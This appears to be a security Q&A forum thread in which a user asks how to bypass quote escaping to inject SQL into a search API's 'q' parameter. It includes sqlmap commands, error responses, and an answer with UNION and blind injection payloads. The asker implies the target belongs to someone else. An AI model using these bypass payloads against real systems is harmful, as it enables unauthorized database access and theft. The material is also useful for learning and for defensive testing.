# API Sql Injection

Tags: sql-injection, api, iis, sqlmap

I need some help with an SQL injection at an API.

Webserver IIS 8.5

The GET request looks like this

```
...
https://example.com/api/Search?q=Landing
```

The Response looks like this

```
HTTP/1.1 200 OK
...
[{"pageId":1,"pageName":"Landing Page"}]
```

The SQL query where I tried to inject when I send a normal request looks like this:

```
... LIKE '%Lending%' ...
```

Now when I create a request like this

```
...
https://example.com/api/Search?q=Landing\'
```

The response looks like this:

```
HTTP/1.1 500 Internal Server Error
...
["exceptionMessage":"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%') OR (`Extent1`.`Name` LIKE '%Landing\\''%')) OR (`Extent1`.`TabContent` LIKE '%' at line 80",]
```

A response with error code 500 and it seems like their  protection mechanism is duplicating the chars \ and '

Now when I fire up SQLmap, it is unable to perforn an injection

```
python .\sqlmap.py -r .\request.txt --threads=10 --random-agent  --level=5 --risk=3 --dbms=mysql --banner --time-sec 10 --tamper=escapequotes --ignore-code=500 -v2 -p q
....
[INFO] heuristic (basic) test shows that GET parameter 'q' might be injectable (possible DBMS: 'MySQL')
....
[WARNING] GET parameter 'q' does not seem to be injectable
```

I use a tamper script because of ' `(Slash escape single and double quotes (e.g. ' -> \'))`

And a request like this

```
https://example.com/api/Search?q=Landing\\'
```

Returns this Response:

```
HTTP/1.1 200 OK
...
[]
```

Also

A request like this

```
https://example.com/api/Search?q=Landing\\''
```

Returns this Response:

```
HTTP/1.1 200 OK
...
[]
```

Also

A request with single quota returns zero.

```
https://example.com/api/Search?q=Landing'
```

Return this Response:

```
HTTP/1.1 200 OK
...
[]
```

How to bypass this protection and successfully perform an SQL injection?

Comment: You need to learn about URL syntax first. Then you need to learn SQL. Then you need to reverse engineer how sql is created from your url. Then you need to figure out what sql you want, what url to send for this, and how to create this url.

Answer (score 0):

Looking at your example requests, it looks like the application escapes `'`, but fails to escape `\`. This means that you can inject a `'` to break out of the string context (via `\'`), but you can't use a `'` in the rest of your injection (even if escaping via `\'`; which is giving sqlmap problems, so I'd suggest manual exploitation).

You have this:

```
'   -> \'     <- no error, string is correctly escaped
\'  -> \\'    <- \ is escaped by \, so ' exits the string context, giving an error
\\' -> \\\'   <- \ is escaped by \, ' is escaped by \, so no error
```

What I would do first now is repair the query. Something like `Landing\'))--x-` (you may need to adjust the closing bracket count, I'm going of the error message). This should again give you a 200 and some results.

Once the query is fixed again, you can now inject your desired query. `Landing\')) union select 1 --x-` might work (an alternative would be blind injection, eg `Landing\')) and substring(version(),1,1)=5--x-` (or the mssql equivalent)).

My guess is that sqlmap is running into problems because you can't use `'` in your injection (except for the initial `\'` to escape the existing string context). Imagine eg an injection into `SELECT 1 FROM table WHERE id LIKE '%[userinput]%'`. Injecting `\'--x-` works, as it gives `SELECT 1 FROM table WHERE id LIKE '%\\'--x-%'` (which then runs `SELECT 1 FROM table WHERE id LIKE '%\'` on the db). But injecting `\' and x = \'test` wouldn't work, as it results in `SELECT 1 FROM table WHERE id LIKE '\\' and x = \\'test'` (which runs as `SELECT 1 FROM table WHERE id LIKE '\' and x = \'test'` on the db, which is invalid because of the extra `\` in front of `'test'`).

Comment: Thank you @tim for the detailed answer. But I'm unable to repair query. ('Landing\'))--x-') it doesn't matter how many brackets I put always getting error 500. Response ('LIKE '%Landing\\''))--x-%'))' )